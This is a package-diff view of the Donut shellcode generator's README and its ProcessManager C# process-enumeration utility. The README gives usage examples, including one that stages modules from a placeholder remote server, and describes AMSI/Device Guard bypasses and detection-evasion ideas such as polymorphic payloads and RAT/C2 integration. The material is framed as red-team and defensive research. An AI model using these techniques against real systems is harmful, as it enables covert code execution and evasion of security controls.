48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+6
-0
ProcessManager/App.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3
4 <supportedRuntime version="v2.0.50727"/></startup>
5 </configuration>
+29
-0
ProcessManager/LICENSE less more
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+57
-0
ProcessManager/ProcessManager.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ProcessManager</RootNamespace>
9 <AssemblyName>ProcessManager</AssemblyName>
10 <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 <Prefer32Bit>false</Prefer32Bit>
26 </PropertyGroup>
27 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 <PlatformTarget>AnyCPU</PlatformTarget>
29 <DebugType>pdbonly</DebugType>
30 <Optimize>true</Optimize>
31 <OutputPath>bin\Release\</OutputPath>
32 <DefineConstants>TRACE</DefineConstants>
33 <ErrorReport>prompt</ErrorReport>
34 <WarningLevel>4</WarningLevel>
35 <Prefer32Bit>false</Prefer32Bit>
36 </PropertyGroup>
37 <ItemGroup>
38 <Reference Include="System" />
39 <Reference Include="System.Core" />
40 <Reference Include="System.Management" />
41 <Reference Include="System.Xml.Linq" />
42 <Reference Include="System.Data.DataSetExtensions" />
43 <Reference Include="Microsoft.CSharp" />
44 <Reference Include="System.Data" />
45 <Reference Include="System.Net.Http" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="App.config" />
54 </ItemGroup>
55 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
56 </Project>
+11
-0
ProcessManager/ProcessManager.csproj.user less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
3 <StartArguments>
4 </StartArguments>
5 </PropertyGroup>
6 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
7 <StartArguments>
8 </StartArguments>
9 </PropertyGroup>
10 </Project>
+25
-0
ProcessManager/ProcessManager.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
23 EndGlobalSection
24 EndGlobal
+579
-0
ProcessManager/Program.cs less more
0 /** Name: ProcessManager
1 * Author: TheWover
2 * Description: Displays useful information about processes running on a local or remote machine.
3 *
4 * Last Modified: 04/13/2018
5 *
6 */
7
8 using System;
9 using System.Linq;
10 using System.Diagnostics;
11 using System.Runtime.InteropServices;
12 using System.ComponentModel;
13 using System.Security.Principal;
14
15 namespace ProcessManager
16 {
17
18 class Program
19 {
20 private struct Arguments
21 {
22 public string processname;
23 public string machinename;
24 public bool help;
25 }
26
27 static void Main(string[] args)
28 {
29 //Parse command-line arguments
30 Arguments arguments = ParseArgs(args);
31
32 if (args.Length > 0)
33 {
34 if (arguments.help == true)
35 {
36 PrintUsage();
37 Environment.Exit(0);
38 }
39
40 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
41
42 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
43 if (arguments.machinename != null)
44 {
45 try
46 {
47 if (arguments.processname != null)
48
49 //Enumerate the processes
50 DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
51 else
52
53 //Enumerate the processes
54 DescribeProcesses(Process.GetProcesses(arguments.machinename));
55 }
56 catch
57 {
58 Console.WriteLine("Error: Invalid machine name.");
59
60 Environment.Exit(1);
61 }
62 }
63 else
64 {
65 if (arguments.processname != null)
66 //Enumerate the processes
67 DescribeProcesses(Process.GetProcessesByName(arguments.processname));
68 else
69 //Enumerate the processes
70 DescribeProcesses(Process.GetProcesses());
71 }
72
73 }
74 else
75 {
76 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
77
78 DescribeProcesses(Process.GetProcesses());
79 }
80 }
81
82 private static Arguments ParseArgs(string[] args)
83 {
84 Arguments arguments = new Arguments();
85 arguments.help = false;
86 arguments.machinename = null;
87 arguments.processname = null;
88
89 if (args.Length > 0)
90 {
91 if (args.Contains("--help") || args.Contains("-h"))
92 {
93 arguments.help = true;
94 }
95 }
96
97 //Filter by process name
98 if (args.Contains("--name") && args.Length >= 2)
99 {
100 //The number of the command line argument that specifies the process name
101 int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
102
103 arguments.processname = args[nameindex];
104 }
105
106 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
107 if (args.Contains("--machine") && args.Length >= 2)
108 {
109 try
110 {
111 //The number of the command line argument that specifies the machine name
112 int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
113
114 arguments.machinename = args[machineindex];
115 }
116 catch
117 {
118 Console.WriteLine("Error: Invalid machine name.");
119
120 Environment.Exit(1);
121 }
122
123 }
124
125 return arguments;
126 }
127
128 private static void PrintUsage()
129 {
130 Console.WriteLine();
131 Console.WriteLine("| Process Manager [v0.2]");
132 Console.WriteLine("| Copyright (c) 2019 TheWover");
133 Console.WriteLine();
134
135 Console.WriteLine("Usage: ProcessManager.exe [machine]");
136 Console.WriteLine();
137
138 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
139 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
140 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
141 Console.WriteLine();
142
143 Console.WriteLine("Examples:");
144 Console.WriteLine();
145
146 Console.WriteLine("ProcessManager.exe");
147 Console.WriteLine("ProcessManager.exe --name svchost");
148 Console.WriteLine("ProcessManager.exe --machine workstation2");
149 Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
150 Console.WriteLine();
151 }
152
153 private static void DescribeProcesses(Process[] processes)
154 {
155
156 //Sort in ascending order by PID
157 processes = processes.OrderBy(p => p.Id).ToArray();
158
159 foreach (Process process in processes)
160 {
161 //Get the PID
162 ProcessDetails details = new ProcessDetails();
163 details.name = process.ProcessName;
164 details.pid = process.Id;
165
166 try
167 {
168 //Get the PPID
169 Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
170 if (parent != null)
171 details.ppid = parent.Id;
172 else
173 details.ppid = -1;
174 }
175 //Parent is no longer running
176 catch (InvalidOperationException)
177 {
178 details.ppid = -1;
179 }
180
181
182 //Check the architecture
183 try
184 {
185 if (ProcessInspector.IsWow64Process(process))
186 details.arch = "x86";
187 else
188 details.arch = "x64";
189 }
190 catch
191 {
192 details.arch = "*";
193 }
194
195 try
196 {
197 //Determine whether or not the process is managed (has the CLR loaded).
198 details.managed = ProcessInspector.IsCLRLoaded(process);
199 }
200 //Process is no longer running
201 catch (InvalidOperationException)
202 {
203 details.managed = false;
204 }
205
206
207 try
208 {
209 //Gets the Session of the Process
210 details.session = process.SessionId;
211 }
212 //Process is no longer running
213 catch (InvalidOperationException)
214 {
215 details.session = -1;
216 }
217
218
219 try
220 {
221 //Gets the Integrity Level of the process
222 details.integrity = TokenInspector.GetIntegrityLevel(process);
223 }
224 //Process is no longer running
225 catch (InvalidOperationException)
226 {
227 details.integrity = TokenInspector.IntegrityLevel.Unknown;
228 }
229
230
231 try
232 {
233 //Gets the User of the Process
234 details.user = ProcessInspector.GetProcessUser(process);
235 }
236 //Process is no longer running
237 catch (InvalidOperationException)
238 {
239 details.user = "";
240 }
241
242 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
243 }
244 }
245 }
246
247 public struct ProcessDetails
248 {
249 public string name;
250 public int pid;
251 public int ppid;
252 public string arch;
253 public bool managed;
254 public int session;
255 public TokenInspector.IntegrityLevel integrity;
256 public string user;
257 }
258
259 public static class ProcessInspector
260 {
261
262 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
263 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
264
265 [DllImport("ntdll.dll")]
266 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
267
268 [DllImport("advapi32.dll", SetLastError = true)]
269 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
270 [DllImport("kernel32.dll", SetLastError = true)]
271 [return: MarshalAs(UnmanagedType.Bool)]
272 private static extern bool CloseHandle(IntPtr hObject);
273
274 /// <summary>
275 /// Gets the parent process of a specified process.
276 /// </summary>
277 /// <returns>A Process object representing the parent.</returns>
278 public static Process GetParentProcess(Process process)
279 {
280 return ParentProcessUtilities.GetParentProcess(process.Id);
281 }
282
283 /// <summary>
284 /// Gets the parent process of a specified process.
285 /// </summary>
286 /// <returns>A Process object representing the parent.</returns>
287 public static Process GetParentProcess()
288 {
289 return GetParentProcess(Process.GetCurrentProcess());
290 }
291
292 /// <summary>
293 /// Checks whether the process is 64-bit.
294 /// </summary>
295 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
296 public static bool IsWow64Process(Process process)
297 {
298 bool retVal = false;
299 IsWow64Process(process.Handle, out retVal);
300 return retVal;
301 }
302
303 /// <summary>
304 /// Checks whether the process is 64-bit.
305 /// </summary>
306 /// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
307 public static bool IsWow64Process()
308 {
309 bool retVal = false;
310 IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
311 return retVal;
312 }
313
314 /// <summary>
315 /// Checks if the CLR has been loaded into the specified process by
316 /// looking for loaded modules that contain "mscor" in the name.
317 /// </summary>
318 /// <param name="process">The process to check.</param>
319 /// <returns>True if the CLR has been loaded. False if it has not.</returns>
320 public static bool IsCLRLoaded(Process process)
321 {
322 try
323 {
324 var modules = from module in process.Modules.OfType<ProcessModule>()
325 select module;
326
327 return modules.Any(pm => pm.ModuleName.Contains("mscor"));
328 }
329 //Access was denied
330 catch (Win32Exception)
331 {
332 return false;
333 }
334 //Process has already exited
335 catch (InvalidOperationException)
336 {
337 return false;
338 }
339
340 }
341
342 /// <summary>
343 /// Gets the owner of a process.
344 ///
345 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
346 /// </summary>
347 /// <param name="process">The process to inspect.</param>
348 /// <returns>The name of the user, or null if it could not be read.</returns>
349 public static string GetProcessUser(Process process)
350 {
351 IntPtr processHandle = IntPtr.Zero;
352 try
353 {
354 OpenProcessToken(process.Handle, 8, out processHandle);
355 WindowsIdentity wi = new WindowsIdentity(processHandle);
356 return wi.Name;
357 }
358 catch
359 {
360 return null;
361 }
362 finally
363 {
364 if (processHandle != IntPtr.Zero)
365 {
366 CloseHandle(processHandle);
367 }
368 }
369 }
370
371 }//end class
372
373 /// <summary>
374 /// A utility class to determine a process parent.
375 /// </summary>
376 [StructLayout(LayoutKind.Sequential)]
377 public struct ParentProcessUtilities
378 {
379 // These members must match PROCESS_BASIC_INFORMATION
380 internal IntPtr Reserved1;
381 internal IntPtr PebBaseAddress;
382 internal IntPtr Reserved2_0;
383 internal IntPtr Reserved2_1;
384 internal IntPtr UniqueProcessId;
385 internal IntPtr InheritedFromUniqueProcessId;
386
387 [DllImport("ntdll.dll")]
388 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
389
390 /// <summary>
391 /// Gets the parent process of the current process.
392 /// </summary>
393 /// <returns>An instance of the Process class.</returns>
394 public static Process GetParentProcess()
395 {
396 return GetParentProcess(Process.GetCurrentProcess().Handle);
397 }
398
399 /// <summary>
400 /// Gets the parent process of specified process.
401 /// </summary>
402 /// <param name="id">The process id.</param>
403 /// <returns>An instance of the Process class.</returns>
404 public static Process GetParentProcess(int id)
405 {
406 try
407 {
408 Process process = Process.GetProcessById(id);
409
410 GetParentProcess(process.Handle);
411
412 return GetParentProcess(process.Handle);
413 }
414 //Access was denied, or
415 catch
416 {
417 return null;
418 }
419 }
420
421 /// <summary>
422 /// Gets the parent process of a specified process.
423 /// </summary>
424 /// <param name="handle">The process handle.</param>
425 /// <returns>An instance of the Process class.</returns>
426 public static Process GetParentProcess(IntPtr handle)
427 {
428 ParentProcessUtilities pbi = new ParentProcessUtilities();
429 int returnLength;
430 int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
431 if (status != 0)
432 throw new Win32Exception(status);
433
434 try
435 {
436 return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
437 }
438 catch (ArgumentException)
439 {
440 // not found
441 return null;
442 }
443 }
444 }
445
446 /// <summary>
447 /// Inspects the tokens of an arbitrary Process and reports useful information.
448 ///
449 /// This class is almost entirely copied from the example provided by pinvoke.net:
450 /// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
451 /// </summary>
452 public class TokenInspector
453 {
454 [DllImport("advapi32.dll", SetLastError = true)]
455 static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
456
457 [DllImport("advapi32.dll", SetLastError = true)]
458 static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
459
460 // winnt.h, Windows SDK v6.1
461 const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
462 const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
463 const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
464 const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
465 const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
466 const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
467
468 [DllImport("advapi32.dll", SetLastError = true)]
469 [return: MarshalAs(UnmanagedType.Bool)]
470 static extern bool OpenProcessToken(
471 IntPtr ProcessHandle,
472 UInt32 DesiredAccess,
473 out IntPtr TokenHandle
474 );
475
476 const UInt32 TOKEN_QUERY = 0x0008;
477
478 [DllImport("advapi32.dll", SetLastError = true)]
479 static extern bool GetTokenInformation(
480 IntPtr TokenHandle,
481 TOKEN_INFORMATION_CLASS TokenInformationClass,
482 IntPtr TokenInformation,
483 uint TokenInformationLength,
484 out uint ReturnLength
485 );
486
487 enum TOKEN_INFORMATION_CLASS
488 {
489 TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
490
491 /// <summary>
492 /// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
493 /// </summary>
494 TokenIntegrityLevel,
495
496 TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
497 }
498
499 public enum IntegrityLevel
500 {
501 Low, Medium, High, System, None, Unknown
502 }
503
504 const int ERROR_INVALID_PARAMETER = 87;
505
506 [DllImport("kernel32.dll", SetLastError = true)]
507 static extern bool CloseHandle(IntPtr hHandle);
508
509
510 public static IntegrityLevel GetIntegrityLevel(Process process)
511 {
512 try
513 {
514 IntPtr pId = (process.Handle);
515
516 IntPtr hToken = IntPtr.Zero;
517 if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
518 {
